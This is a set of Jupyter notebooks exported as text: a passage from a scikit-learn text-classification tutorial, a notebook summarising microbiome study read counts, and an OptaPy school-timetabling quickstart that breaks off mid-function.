curve to see what percent of the corpus can be tagged by the classifier, and which should undergo a manual clerical review. Based on this curve, we might say that we can use our classifier to tag the 25% of the documents that have the highest scores as 1, and manually review the rest. Alternatively, we can try to maximize the entire precision-recall space. In this case we need a different metric. ###Code def plot_precision_recall(y_true,y_score): """ Plot a precision recall curve Parameters ---------- y_true: ls ground truth labels y_score: ls score output from model """ precision_curve, recall_curve, pr_thresholds = precision_recall_curve(y_true,y_score[:,1]) plt.plot(recall_curve, precision_curve) plt.xlabel('Recall') plt.ylabel('Precision') auc_val = auc(recall_curve,precision_curve) print('AUC-PR: {0:.2f}'.format(auc_val)) plt.show() plt.clf() plot_precision_recall(labels_binary[test_set_idx],y_score) ###Output _____no_output_____ ###Markdown The AUC shows how accurate our scores are under different cutoff thresholds. The model will output a score between 0 and 1. We specify a range of cutoff values and label all of the examples as 0 or 1 based on whether they are above or below each cutoff value.
The closer our scores are to the true values, the more resilient they are to different cutoffs. For instance, if our scores were perfect, our AUC would be 1. Feature Importances ###Code def display_feature_importances(coef,features, labels, num_features=10): """ output feature importances Parameters ---------- coef: numpy feature importances features: ls feature names labels: ls labels for the classifier num_features: int number of features to output (default 10) Example -------- """ #rank the words by their (signed) model coefficient dict_feature_importances = dict( zip(features, coef) ) orddict_feature_importances = OrderedDict( sorted(dict_feature_importances.items(), key=lambda x: x[1]) ) ls_sorted_features = list(orddict_feature_importances.keys()) label0_features = ls_sorted_features[:num_features] label1_features = ls_sorted_features[-num_features:] print(labels[0],label0_features) print(labels[1], label1_features) display_feature_importances(mdl.coef_.ravel(), features, ['health','income']) ###Output _____no_output_____ ###Markdown The feature importances give us the words which are the most relevant for distinguishing the type of social service agency (between income and health). Some of these make sense ("city church" seems more likely to be health than income), but some don't make as much sense, or seem to be artifacts from the website that we should remove ("housing humancarelogo"). --- Exercise 6 Display the top 25 feature importances to get an intuition of which words are the most and least important. We need to tell the function that we want the top 25 feature importances. We can do this by consulting the docstring of the function. From this docstring we can see that `num_features` is a keyword argument that is set to 10 by default. We can pass `num_features=25` into the keyword argument instead to get the top 25 feature importances. ###Code display_feature_importances(mdl.coef_.ravel(), features, ['health','income'], num_features=25) ###Output _____no_output_____ ###Markdown --- Cross-validationRecall from the machine learning tutorial that we are seeking to find the most general pattern in the data in order to have the most general model that will be successful at classifying new unseen data. Our previous strategy above was the *Out-of-sample and holdout set*. With this strategy we try to find a general pattern by randomly dividing our data into a test and training set based on some percentage split (e.g., 50-50 or 80-20). We train on the training set and evaluate on the test set, where we pretend that we don't have the labels for the test set. A significant drawback with this approach is that we may be lucky or unlucky with our random split, and so our estimate of how we'd perform on truly new data is overly optimistic or overly pessimistic. A possible solution is to create many random splits into training and testing sets and evaluate each split to estimate the performance of a given model. A more sophisticated holdout training and testing procedure is *cross-validation*. In cross-validation we split our data into *k* folds or partitions, where *k* is usually 5 or 10. We then iterate k times. In each iteration, one of the folds is used as a test set, and the rest of the folds are combined to form the training set. We can then evaluate the performance at each iteration to estimate the performance of a given method. An advantage of cross-validation is that every example ends up in a test fold exactly once and in the training folds for all of the other iterations.
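To make the fold mechanics concrete, here is a tiny sketch using the modern `sklearn.model_selection` API; the ten example "documents" are just invented index numbers. ###Code
import numpy as np
from sklearn.model_selection import KFold

toy = np.arange(10)  # ten example indices, invented purely for illustration
for fold, (tr, te) in enumerate(KFold(n_splits=3, shuffle=True, random_state=0).split(toy)):
    # each example lands in exactly one test fold across the three iterations
    print('fold', fold, '| train:', toy[tr], '| test:', toy[te])
###Output _____no_output_____ ###Markdown The helper below does the same thing on our real corpus, re-vectorizing the text inside each fold so the test fold does not leak into the features: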
###Code def create_test_train_bag_of_words(train_corpus, test_corpus): """ Create test and training set bag of words Parameters ---------- train_corpus: ls ls of raw text for the training corpus. test_corpus: ls ls of raw text for the test corpus. Returns ------- (train_bag_of_words,test_bag_of_words): scipy sparse matrix bag-of-words representation of train and test corpus features: ls ls of words used as features. """ #parameters for vectorizer ANALYZER = "word" #unit of features are single words rather than phrases of words STRIP_ACCENTS = 'unicode' TOKENIZER = None NGRAM_RANGE = (1,2) #Range for phrases of words: unigrams and bigrams MIN_DF = 0.01 # Exclude words that have a frequency less than the threshold MAX_DF = 0.8 # Exclude words that have a frequency greater than the threshold vectorizer = CountVectorizer(analyzer=ANALYZER, tokenizer=None, # alternatively tokenize_and_stem but it will be slower ngram_range=NGRAM_RANGE, stop_words = stopwords.words('english'), strip_accents=STRIP_ACCENTS, min_df = MIN_DF, max_df = MAX_DF) NORM = None #turn on normalization flag SMOOTH_IDF = True #prevents division by zero errors SUBLINEAR_IDF = True #replace TF with 1 + log(TF) USE_IDF = True #flag to control whether to use TFIDF transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = SUBLINEAR_IDF) #get the bag-of-words from the vectorizer and #then use TFIDF to limit the tokens found throughout the text train_bag_of_words = vectorizer.fit_transform( train_corpus ) test_bag_of_words = vectorizer.transform( test_corpus ) if USE_IDF: train_tfidf = transformer.fit_transform(train_bag_of_words) test_tfidf = transformer.transform(test_bag_of_words) features = vectorizer.get_feature_names_out() return train_tfidf, test_tfidf, features from sklearn.model_selection import StratifiedKFold #sklearn.cross_validation was removed in later scikit-learn releases cv = StratifiedKFold(n_splits=3) train_labels_binary = le.transform(train_labels) for i, (train,test) in enumerate(cv.split(train_corpus, train_labels_binary)): cv_train = train_corpus[train] cv_test = train_corpus[test] bag_of_words_train, bag_of_words_test, feature_names = create_test_train_bag_of_words(cv_train, cv_test) probas_ = clf.fit(bag_of_words_train, train_labels_binary[train]).predict_proba(bag_of_words_test) cv_test_labels = train_labels_binary[test] precision_curve, recall_curve, pr_thresholds = precision_recall_curve(cv_test_labels, probas_[:,1]) auc_val = auc(recall_curve,precision_curve) plt.plot(recall_curve, precision_curve, label='AUC-PR {0} {1:.2f}'.format(i,auc_val)) plt.ylim(0,1.05) plt.xlabel('Recall') plt.ylabel('Precision') plt.legend(loc="lower left", fontsize='x-small') ###Output _____no_output_____ ###Markdown In this case we did 3-fold cross-validation and plotted precision-recall curves for each iteration. You can see that there is a marked difference between the iterations. We can then average the AUC-PR of each iteration to estimate the performance of our method. --- Exercise 7 Try 5-fold cross-validation.
###Code from sklearn.model_selection import StratifiedKFold cv = StratifiedKFold(n_splits=5) train_labels_binary = le.transform(train_labels) for i, (train,test) in enumerate(cv.split(train_corpus, train_labels_binary)): cv_train = train_corpus[train] cv_test = train_corpus[test] bag_of_words_train, bag_of_words_test, feature_names = create_test_train_bag_of_words(cv_train, cv_test) probas_ = clf.fit(bag_of_words_train, train_labels_binary[train]).predict_proba(bag_of_words_test) cv_test_labels = train_labels_binary[test] precision_curve, recall_curve, pr_thresholds = precision_recall_curve(cv_test_labels, probas_[:,1]) auc_val = auc(recall_curve,precision_curve) plt.plot(recall_curve, precision_curve, label='AUC-PR {0} {1:.2f}'.format(i,auc_val)) plt.ylim(0,1.05) plt.xlabel('Recall') plt.ylabel('Precision') plt.legend(loc="lower left", fontsize='x-small') ###Output _____no_output_____ ###Markdown --- Examples of Tagging ###Code df_test num_comments = 2 label0_comment_idx = y_score[:,1].argsort()[:num_comments] label1_comment_idx = y_score[:,1].argsort()[-num_comments:] test_set_labels = labels[test_set_idx] #convert back to the indices of the original dataset top_comments_testing_set_idx = np.concatenate([label0_comment_idx, label1_comment_idx]) #these are the 4 comments the model is most sure of for i in top_comments_testing_set_idx: print( u"""{}:{}\n---\n{}\n===""".format(test_set_labels[i], y_score[i,1], test_corpus[i])) ###Output _____no_output_____
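###Markdown Finally, a hedged sketch of how the fitted pipeline could tag a brand-new document; the example text is invented, and `vectorizer`, `transformer`, `mdl`, and `le` come from the cells above. ###Code
new_doc = "free clinic offering health screenings and counseling"  # invented example text
new_bow = vectorizer.transform([new_doc])    # build the same features used in training
new_tfidf = transformer.transform(new_bow)   # apply the same tf-idf weighting
pred = mdl.predict(new_tfidf)
print(le.inverse_transform(pred), mdl.predict_proba(new_tfidf))
###Output _____no_output_____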
scripts/count_reads.ipynb
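###Markdown The cells below rely on a handful of imports and on a `save_dir` output directory that are not shown in this excerpt; a minimal setup cell might look like the following (the `save_dir` value is an assumption): ###Code
import glob
import os
from os.path import join

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import calour as ca

save_dir = '.'  # directory where summary.txt is written and read; assumed, not specified here
###Output _____no_output_____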
###Markdown Create a table with mean, std and median of number of reads per sample for each study ###Code def count_reads(out_file,rarefaction_depths): '''Count the reads for each sample in each cohort and save the mean, median and std Parameters ---------- out_file:str name of the output tsv file rarefaction_depths: list of int the rarefactions to test ''' cols = ['cohort','mean','median','std','num_samples','num_HC','num_disease'] for crare in rarefaction_depths: cols.append('num_rare_%d' % crare) df=pd.DataFrame(columns=cols) out_file = join(save_dir,out_file) num_processed = 0 for cname in glob.glob('../studies/*'): if os.path.isdir(cname): print('**********') print(cname) tables = glob.glob(os.path.join(cname,'all.*biom')) print(tables) if len(tables)==0: print('dir %s does not contain a biom table' % cname) continue bt=tables[0] data=ca.read_amplicon(os.path.join(bt),os.path.join(cname,'up.map.csv'),normalize=10000,min_reads=1000) data=data.filter_samples('type',['HC','disease']) print('-------------') print(data) cline={} cline['cohort']=cname cline['mean']=np.mean(data.sample_metadata._calour_original_abundance) cline['median']=np.median(data.sample_metadata._calour_original_abundance) cline['std']=np.std(data.sample_metadata._calour_original_abundance) cline['num_samples'] = len(data.sample_metadata) cline['num_HC'] = np.sum(data.sample_metadata['type']=='HC') cline['num_disease'] = np.sum(data.sample_metadata['type']=='disease') for crare in rarefaction_depths: cline['num_rare_%d' % crare] = np.sum(data.sample_metadata._calour_original_abundance >= crare) df = df.append(cline,ignore_index=True) num_processed += 1 print('processed %d studies' % num_processed) df.to_csv(out_file,sep='\t') ca.set_log_level('ERROR') count_reads(out_file='summary.txt', rarefaction_depths=[1000, 4000, 7500, 10000]) ###Output ********** ../studies/61 ['../studies/61/all.biom'] ------------- AmpliconExperiment with 41 samples, 2715 features ********** ../studies/59 ['../studies/59/all.biom'] ------------- AmpliconExperiment with 33 samples, 2637 features ********** ../studies/50 ['../studies/50/all.biom'] ------------- AmpliconExperiment with 58 samples, 959 features ********** ../studies/57 ['../studies/57/all.biom'] ------------- AmpliconExperiment with 85 samples, 4058 features ********** ../studies/32 ['../studies/32/all.biom'] ------------- AmpliconExperiment with 43 samples, 1748 features ********** ../studies/56 ['../studies/56/all.biom'] ------------- AmpliconExperiment with 43 samples, 3045 features ********** ../studies/51 ['../studies/51/all.biom'] ------------- AmpliconExperiment with 164 samples, 3240 features ********** ../studies/58 ['../studies/58/all.biom'] ------------- AmpliconExperiment with 45 samples, 3005 features ********** ../studies/60 ['../studies/60/all.biom'] ------------- AmpliconExperiment with 73 samples, 3771 features ********** ../studies/34 ['../studies/34/all.biom'] ------------- AmpliconExperiment with 32 samples, 1234 features ********** ../studies/33 ['../studies/33/all.biom'] ------------- AmpliconExperiment with 58 samples, 1250 features ********** ../studies/20 ['../studies/20/all.biom'] ------------- AmpliconExperiment with 151 samples, 1622 features ********** ../studies/18 ['../studies/18/all.biom'] ------------- AmpliconExperiment with 84 samples, 1183 features ********** ../studies/27 ['../studies/27/all.biom'] ------------- AmpliconExperiment with 233 samples, 1403 features ********** ../studies/9 ['../studies/9/all.biom'] ------------- AmpliconExperiment 
with 451 samples, 3722 features ********** ../studies/11 ['../studies/11/all.biom'] ------------- AmpliconExperiment with 109 samples, 2312 features ********** ../studies/7 ['../studies/7/all.biom'] ------------- AmpliconExperiment with 441 samples, 4403 features ********** ../studies/29 ['../studies/29/all.biom'] ------------- AmpliconExperiment with 594 samples, 3470 features ********** ../studies/16 ['../studies/16/all.biom'] ------------- AmpliconExperiment with 119 samples, 2116 features ********** ../studies/42 ['../studies/42/all.biom'] ------------- AmpliconExperiment with 96 samples, 3829 features ********** ../studies/45 ['../studies/45/all.biom'] ------------- AmpliconExperiment with 1043 samples, 14981 features ********** ../studies/6 ['../studies/6/all.biom'] ------------- AmpliconExperiment with 612 samples, 4175 features ********** ../studies/28 ['../studies/28/all.biom'] ------------- AmpliconExperiment with 135 samples, 1306 features ********** ../studies/17 ['../studies/17/all.biom'] ------------- AmpliconExperiment with 50 samples, 2307 features ********** ../studies/1 ['../studies/1/all.biom'] ------------- AmpliconExperiment with 38 samples, 1082 features ********** ../studies/10 ['../studies/10/all.biom'] ------------- AmpliconExperiment with 174 samples, 3295 features ********** ../studies/19 ['../studies/19/all.biom'] ------------- AmpliconExperiment with 68 samples, 1401 features ********** ../studies/26 ['../studies/26/all.biom'] ------------- AmpliconExperiment with 25 samples, 11834 features ********** ../studies/8 ['../studies/8/all.biom'] ------------- AmpliconExperiment with 33 samples, 780 features ********** ../studies/21 ['../studies/21/all.biom'] ------------- AmpliconExperiment with 178 samples, 2597 features ********** ../studies/44 ['../studies/44/all.biom'] ------------- AmpliconExperiment with 835 samples, 11915 features ********** ../studies/43 ['../studies/43/all.biom'] ------------- AmpliconExperiment with 89 samples, 3426 features ********** ../studies/36 ['../studies/36/all.biom'] ------------- AmpliconExperiment with 15 samples, 1191 features ********** ../studies/31 ['../studies/31/all.biom'] ------------- AmpliconExperiment with 70 samples, 1929 features ********** ../studies/62 ['../studies/62/all.biom'] ------------- AmpliconExperiment with 196 samples, 5813 features ********** ../studies/54 ['../studies/54/all.biom'] ------------- AmpliconExperiment with 63 samples, 3657 features ********** ../studies/53 ['../studies/53/all.biom'] ------------- AmpliconExperiment with 115 samples, 4878 features ********** ../studies/37 ['../studies/37/all.biom'] ------------- AmpliconExperiment with 727 samples, 12055 features ********** ../studies/39 ['../studies/39/all.biom'] ------------- AmpliconExperiment with 587 samples, 10422 features ********** ../studies/52 ['../studies/52/all.biom'] ------------- AmpliconExperiment with 30 samples, 2580 features ********** ../studies/55 ['../studies/55/all.biom'] ------------- AmpliconExperiment with 74 samples, 3939 features ********** ../studies/46 ['../studies/46/all.biom'] ------------- AmpliconExperiment with 554 samples, 10980 features ********** ../studies/41 ['../studies/41/all.biom'] ------------- AmpliconExperiment with 80 samples, 3557 features ********** ../studies/48 ['../studies/48/all.biom'] ------------- AmpliconExperiment with 280 samples, 6184 features ********** ../studies/24 ['../studies/24/all.biom'] ------------- AmpliconExperiment with 25 samples, 999 features ********** ../studies/23 
['../studies/23/all.biom'] ------------- AmpliconExperiment with 114 samples, 1867 features ********** ../studies/4 ['../studies/4/all.biom'] ------------- AmpliconExperiment with 82 samples, 1652 features ********** ../studies/15 ['../studies/15/all.biom'] ------------- AmpliconExperiment with 162 samples, 2103 features ********** ../studies/3 ['../studies/3/all.biom'] ------------- AmpliconExperiment with 334 samples, 3021 features ********** ../studies/12 ['../studies/12/all.biom'] ------------- AmpliconExperiment with 224 samples, 13732 features ********** ../studies/49 ['../studies/49/all.biom'] ------------- AmpliconExperiment with 263 samples, 8112 features ********** ../studies/40 ['../studies/40/all.biom'] ------------- AmpliconExperiment with 85 samples, 3917 features ********** ../studies/47 ['../studies/47/all.biom'] ------------- AmpliconExperiment with 247 samples, 7437 features ********** ../studies/2 ['../studies/2/all.biom'] ------------- AmpliconExperiment with 179 samples, 2528 features ********** ../studies/13 ['../studies/13/all.biom'] ------------- AmpliconExperiment with 31 samples, 925 features ********** ../studies/5 ['../studies/5/all.biom'] ------------- AmpliconExperiment with 333 samples, 4664 features ********** ../studies/14 ['../studies/14/all.biom'] ------------- AmpliconExperiment with 123 samples, 1271 features ********** ../studies/22 ['../studies/22/all.biom'] ------------- AmpliconExperiment with 144 samples, 2687 features ********** ../studies/25 ['../studies/25/all.biom'] ------------- AmpliconExperiment with 89 samples, 1781 features processed 59 studies ###Markdown Plot the summary stats ###Code df=pd.read_csv(join(save_dir,'summary.txt'), sep='\t') df=df.sort_values('median') f=plt.figure() plt.bar(np.arange(len(df)),df['median']) plt.yscale('log') plt.ylabel('median reads/study') plt.xlabel('study') pass df=df.sort_values('mean') f=plt.figure() plt.bar(np.arange(len(df)),df['mean']) plt.yscale('log') plt.ylabel('mean reads/study') plt.xlabel('study') pass plt.figure() plt.hist(df['median'],60) plt.xlabel('median reads/study') plt.ylabel('number of studies') pass df=df.sort_values('median') df ###Output _____no_output_____ ###Markdown Choose the rarefaction depth to work with ###Code df=df.sort_values('num_rare_4000') df ###Output _____no_output_____
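###Markdown One way to act on this table is to compute, for each candidate depth, the fraction of samples each study would keep after rarefaction; a short sketch using the columns built above: ###Code
for d in [1000, 4000, 7500, 10000]:
    kept = df['num_rare_%d' % d] / df['num_samples']
    print('depth %5d: %.0f%% of studies keep at least 90%% of their samples'
          % (d, 100 * np.mean(kept >= 0.9)))
###Output _____no_output_____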
school-timetabling/school-timetabling-quickstart.ipynb
###Markdown OptaPy - OptaPlanner in PythonOptaPy is an **AI constraint solver for Python** to optimize the Vehicle Routing Problem, Employee Rostering, Maintenance Scheduling, Task Assignment, School Timetabling, Cloud Optimization, Conference Scheduling, Job Shop Scheduling, Bin Packing and many more planning problems.OptaPy wraps the [OptaPlanner](https://www.optaplanner.org/) engine internally, but using OptaPy in Python is significantly slower than using OptaPlanner in Java or Kotlin.WARNING: OptaPy is an experimental technology. It is at least 20 times slower than using OptaPlanner in Java or Kotlin. What is OptaPlanner?OptaPlanner is an AI constraint solver. It optimizes planning and scheduling problems, such as the Vehicle Routing Problem, Employee Rostering, Maintenance Scheduling, Task Assignment, School Timetabling, Cloud Optimization, Conference Scheduling, Job Shop Scheduling, Bin Packing and many more. Every organization faces such challenges: assign a limited set of constrained resources (employees, assets, time and/or money) to provide products or services. OptaPlanner delivers more efficient plans, which reduce costs and improve service quality.Constraints apply on plain domain objects and can call existing code. There’s no need to input constraints as mathematical equations. Under the hood, OptaPlanner combines sophisticated Artificial Intelligence optimization algorithms (such as Tabu Search, Simulated Annealing, Late Acceptance and other metaheuristics) with very efficient score calculation and other state-of-the-art constraint solving techniques. An Example: School Timetabling Model the domain objects and constraintsThe goal is to assign each lesson to a time slot and a room. The model is divided into four kinds of objects. Problem FactsProblem facts are facts about the problem. As such, they do not change during solving (and thus cannot have any planning variables). An example problem fact is shown below: ###Code from optapy import problem_fact, planning_id @problem_fact class Room: def __init__(self, id, name): self.id = id self.name = name @planning_id def get_id(self): return self.id def __str__(self): return f"Room(id={self.id}, name={self.name})" ###Output _____no_output_____ ###Markdown The `@problem_fact` decorator creates a Java class for Room, which allows it to be used in constraints. The `@planning_id` decorator tells OptaPlanner that it can use that method for identifying identical pairs. It is only required if you use `fromUniquePair` on the class in a constraint.The code for the Timeslot problem fact is shown below: ###Code @problem_fact class Timeslot: def __init__(self, id, day_of_week, start_time, end_time): self.id = id self.day_of_week = day_of_week self.start_time = start_time self.end_time = end_time @planning_id def get_id(self): return self.id def __str__(self): return ( f"Timeslot(" f"id={self.id}, " f"day_of_week={self.day_of_week}, " f"start_time={self.start_time}, " f"end_time={self.end_time})" ) ###Output _____no_output_____ ###Markdown Planning EntitiesDuring a lesson, represented by the Lesson class, a teacher teaches a subject to a group of students, for example, Math by A.Turing for 9th grade or Chemistry by M.Curie for 10th grade. If a subject is taught multiple times per week by the same teacher to the same student group, there are multiple Lesson instances that are only distinguishable by id.
For example, the 9th grade has six math lessons a week.During solving, OptaPlanner changes the timeslot and room fields of the Lesson class, to assign each lesson to a time slot and a room. Because OptaPlanner changes these fields, Lesson is a planning entity. Here is how we would write it in Python: ###Code from optapy import planning_entity, planning_variable @planning_entity class Lesson: def __init__(self, id, subject, teacher, student_group, timeslot=None, room=None): self.id = id self.subject = subject self.teacher = teacher self.student_group = student_group self.timeslot = timeslot self.room = room @planning_id def get_id(self): return self.id @planning_variable(Timeslot, ["timeslotRange"]) def get_timeslot(self): return self.timeslot def set_timeslot(self, new_timeslot): self.timeslot = new_timeslot @planning_variable(Room, ["roomRange"]) def get_room(self): return self.room def set_room(self, new_room): self.room = new_room def __str__(self): return ( f"Lesson(" f"id={self.id}, " f"timeslot={self.timeslot}, " f"room={self.room}, " f"teacher={self.teacher}, " f"subject={self.subject}, " f"student_group={self.student_group}" f")" ) ###Output _____no_output_____ ###Markdown The `@planning_entity` decorator creates a Java class for Lesson, which allows it to be used in constraints.The `@planning_variable` decorator specifies that a method returns a planning variable. As such, OptaPlanner will call the corresponding setter to change the value of the variable during solving. It must be named `get%Variable()` and has a corresponding setter `set%Variable` (where `%Variable` is the name of the variable). It takes two parameters:- The first parameter is the type this planning variable takes.- The second parameter, `value_range_provider_refs`, describes where it gets its values from. It is a list of the ids of its value range providers. The ConstraintsThe constraints tell OptaPlanner how good a solution is. Here is how we create the constraints in Python: ###Code from optapy import constraint_provider, get_class from optapy.types import Joiners, HardSoftScore from datetime import datetime, date, timedelta LessonClass = get_class(Lesson) RoomClass = get_class(Room) # Trick since timedelta only works with datetime instances today = date.today() def within_30_minutes(lesson1, lesson2): between = datetime.combine(today, lesson1.timeslot.end_time) - datetime.combine(today, lesson2.timeslot.start_time) return timedelta(minutes=0) <= between <= timedelta(minutes=30) @constraint_provider def define_constraints(constraint_factory): return [ # Hard constraints room_conflict(constraint_factory), teacher_conflict(constraint_factory), student_group_conflict(constraint_factory), # Soft constraints teacher_room_stability(constraint_factory), teacher_time_efficiency(constraint_factory), student_group_subject_variety(constraint_factory) ] def room_conflict(constraint_factory): # A room can accommodate at most one lesson at the same time. return constraint_factory \ .forEach(LessonClass) \ .join(LessonClass, [ # ... in the same timeslot ... Joiners.equal(lambda lesson: lesson.timeslot), # ... in the same room ... Joiners.equal(lambda lesson: lesson.room), # form unique pairs Joiners.lessThan(lambda lesson: lesson.id) ]) \ .penalize("Room conflict", HardSoftScore.ONE_HARD) def teacher_conflict(constraint_factory): # A teacher can teach at most one lesson at the same time.
return constraint_factory \ .forEach(LessonClass) \ .join(LessonClass, [ Joiners.equal(lambda lesson: lesson.timeslot), Joiners.equal(lambda lesson: lesson.teacher), Joiners.lessThan(lambda lesson: lesson.id) ]) \ .penalize("Teacher conflict", HardSoftScore.ONE_HARD) def student_group_conflict(constraint_factory): # A student can attend at most one lesson at the same time. return constraint_factory \ .forEach(LessonClass) \ .join(LessonClass, [ Joiners.equal(lambda lesson: lesson.timeslot), Joiners.equal(lambda lesson: lesson.student_group), Joiners.lessThan(lambda lesson: lesson.id) ]) \ .penalize("Student group conflict", HardSoftScore.ONE_HARD) def teacher_room_stability(constraint_factory): # A teacher prefers to teach in a single room. return constraint_factory \ .forEach(LessonClass) \ .join(LessonClass, [ Joiners.equal(lambda lesson: lesson.teacher), Joiners.lessThan(lambda lesson: lesson.id) ]) \ .filter(lambda lesson1, lesson2: lesson1.room != lesson2.room) \ .penalize("Teacher room stability", HardSoftScore.ONE_SOFT) def teacher_time_efficiency(constraint_factory): # A teacher prefers to teach sequential lessons and dislikes gaps between lessons. return constraint_factory.forEach(LessonClass) \ .join(LessonClass, [ Joiners.equal(lambda lesson: lesson.teacher), Joiners.equal(lambda lesson: lesson.timeslot.day_of_week) ]) \ .filter(within_30_minutes) \ .reward("Teacher time efficiency", HardSoftScore.ONE_SOFT) def student_group_subject_variety(constraint_factory): # A student group dislikes sequential lessons on the same subject. return constraint_factory.forEach(LessonClass) \ .join(LessonClass, [ Joiners.equal(lambda lesson: lesson.subject), Joiners.equal(lambda lesson: lesson.student_group), Joiners.equal(lambda lesson: lesson.timeslot.day_of_week) ]) \ .filter(within_30_minutes) \ .penalize("Student group subject variety", HardSoftScore.ONE_SOFT) ###Output _____no_output_____ ###Markdown The `@constraint_provider` decorator creates a Java `ConstraintProvider` class, allowing OptaPlanner to use it. You can call any Python method when evaluating your constraints. Planning SolutionFinally, there is the planning solution. The planning solution stores references to all the problem facts and planning entities that define the problem. Additionally, it also contains the score of the solution. The planning solution class represents both the problem and the solution; as such, a problem can be viewed as an uninitialized planning solution.
Here is how we define it in Python: ###Code from optapy import planning_solution, planning_entity_collection_property, \ problem_fact_collection_property, \ value_range_provider, planning_score def format_list(a_list): return ',\n'.join(map(str, a_list)) @planning_solution class TimeTable: def __init__(self, timeslot_list, room_list, lesson_list, score=None): self.timeslot_list = timeslot_list self.room_list = room_list self.lesson_list = lesson_list self.score = score def set_student_group_and_teacher_list(self): self.student_group_list = [] self.teacher_list = [] for lesson in self.lesson_list: if lesson.teacher not in self.teacher_list: self.teacher_list.append(lesson.teacher) if lesson.student_group not in self.student_group_list: self.student_group_list.append(lesson.student_group) @problem_fact_collection_property(Timeslot) @value_range_provider("timeslotRange") def get_timeslot_list(self): return self.timeslot_list @problem_fact_collection_property(Room) @value_range_provider("roomRange") def get_room_list(self): return self.room_list @planning_entity_collection_property(Lesson) def get_lesson_list(self): return self.lesson_list @planning_score(HardSoftScore) def get_score(self): return self.score def set_score(self, score): self.score = score def __str__(self): return ( f"TimeTable(" f"timeslot_list={format_list(self.timeslot_list)},\n" f"room_list={format_list(self.room_list)},\n" f"lesson_list={format_list(self.lesson_list)},\n" f"score={str(self.score.toString()) if self.score is not None else 'None'}" f")" ) ###Output _____no_output_____ ###Markdown The `@planning_solution` decorator creates a Java class for TimeTable, allowing it to be passed to OptaPlanner.The `@problem_fact_collection_property` decorator tells OptaPlanner that the method returns problem facts (it takes in one required argument: the Python class of the problem fact). Similarly, the `@planning_entity_collection_property` decorator tells OptaPlanner that the method returns planning entities (it takes in one required argument: the Python class of the planning entity). The `@value_range_provider` decorator tells OptaPlanner that the method provides values for variables. Its `range_id` parameter is used to determine what planning variable(s) accept values from it. For example, `timeslot` takes values from the `timeslotRange`, so it accepts values from `get_timeslot_list`. Finally, the `@planning_score` decorator tells OptaPlanner that the method returns the planning score (how good the solution is). Like with `@planning_variable`, it must be named `get%Score()` and has a corresponding setter `set%Score` (where `%Score` is the name of the score). Its parameter tells OptaPlanner what kind of score it takes.
SolvingNow that we have defined our model and constraints, let's create an instance of the problem: ###Code from datetime import time def generate_problem(): timeslot_list = [ Timeslot(1, "MONDAY", time(hour=8, minute=30), time(hour=9, minute=30)), Timeslot(2, "MONDAY", time(hour=9, minute=30), time(hour=10, minute=30)), Timeslot(3, "MONDAY", time(hour=10, minute=30), time(hour=11, minute=30)), Timeslot(4, "MONDAY", time(hour=13, minute=30), time(hour=14, minute=30)), Timeslot(5, "MONDAY", time(hour=14, minute=30), time(hour=15, minute=30)), Timeslot(6, "TUESDAY", time(hour=8, minute=30), time(hour=9, minute=30)), Timeslot(7, "TUESDAY", time(hour=9, minute=30), time(hour=10, minute=30)), Timeslot(8, "TUESDAY", time(hour=10, minute=30), time(hour=11, minute=30)), Timeslot(9, "TUESDAY", time(hour=13, minute=30), time(hour=14, minute=30)), Timeslot(10, "TUESDAY", time(hour=14, minute=30), time(hour=15, minute=30)), ] room_list = [ Room(1, "Room A"), Room(2, "Room B"), Room(3, "Room C") ] lesson_list = [ Lesson(1, "Math", "A. Turing", "9th grade"), Lesson(2, "Math", "A. Turing", "9th grade"), Lesson(3, "Physics", "M. Curie", "9th grade"), Lesson(4, "Chemistry", "M. Curie", "9th grade"), Lesson(5, "Biology", "C. Darwin", "9th grade"), Lesson(6, "History", "I. Jones", "9th grade"), Lesson(7, "English", "I. Jones", "9th grade"), Lesson(8, "English", "I. Jones", "9th grade"), Lesson(9, "Spanish", "P. Cruz", "9th grade"), Lesson(10, "Spanish", "P. Cruz", "9th grade"), Lesson(11, "Math", "A. Turing", "10th grade"), Lesson(12, "Math", "A. Turing", "10th grade"), Lesson(13, "Math", "A. Turing", "10th grade"), Lesson(14, "Physics", "M. Curie", "10th grade"), Lesson(15, "Chemistry", "M. Curie", "10th grade"), Lesson(16, "French", "M. Curie", "10th grade"), Lesson(17, "Geography", "C. Darwin", "10th grade"), Lesson(18, "History", "I. Jones", "10th grade"), Lesson(19, "English", "P. Cruz", "10th grade"), Lesson(20, "Spanish", "P. Cruz", "10th grade"), ] lesson = lesson_list[0] lesson.set_timeslot(timeslot_list[0]) lesson.set_room(room_list[0]) return TimeTable(timeslot_list, room_list, lesson_list) ###Output _____no_output_____ ###Markdown and solve it: ###Code from optapy import solver_manager_create from optapy.types import SolverConfig, Duration from tango import pick_color from ipywidgets import Tab from ipysheet import sheet, cell, row, column, cell_range solver_config = SolverConfig().withEntityClasses(get_class(Lesson)) \ .withSolutionClass(get_class(TimeTable)) \ .withConstraintProviderClass(get_class(define_constraints)) \ .withTerminationSpentLimit(Duration.ofSeconds(30)) solution = generate_problem() solution.set_student_group_and_teacher_list() cell_map = dict() def on_best_solution_changed(best_solution): global timetable global solution global cell_map solution = best_solution unassigned_lessons = [] clear_cell_set = set() for (table_name, table_map) in cell_map.items(): for (key, cell) in table_map.items(): clear_cell_set.add(cell) for lesson in solution.lesson_list: if lesson.timeslot is None or lesson.room is None: unassigned_lessons.append(lesson) else: update_lesson_in_table(lesson, clear_cell_set) for cell in clear_cell_set: cell.value = "" cell.style["backgroundColor"] = "white" for (table_name, table_map) in cell_map.items(): for (key, cell) in table_map.items(): cell.send_state() def update_lesson_in_table(lesson, clear_cell_set): global cell_map x = solution.timeslot_list.index(lesson.timeslot) room_column = solution.room_list.index(lesson.room) teacher_column = solution.teacher_list.index(lesson.teacher) student_group_column = solution.student_group_list.index(lesson.student_group) color = pick_color(lesson.subject) room_cell = cell_map['room'][(x, room_column)] teacher_cell = cell_map['teacher'][(x, teacher_column)] student_group_cell = cell_map['student_group'][(x, student_group_column)] clear_cell_set.discard(room_cell) clear_cell_set.discard(teacher_cell) clear_cell_set.discard(student_group_cell) room_cell.value = f"{lesson.subject}\n{lesson.teacher}\n{lesson.student_group}" room_cell.style["backgroundColor"] = color room_cell.send_state() teacher_cell.value = f"{lesson.room.name}\n{lesson.subject}\n{lesson.student_group}" teacher_cell.style["backgroundColor"] = color teacher_cell.send_state() student_group_cell.value = f"{lesson.room.name}\n{lesson.subject}\n{lesson.teacher}" student_group_cell.style["backgroundColor"] = color 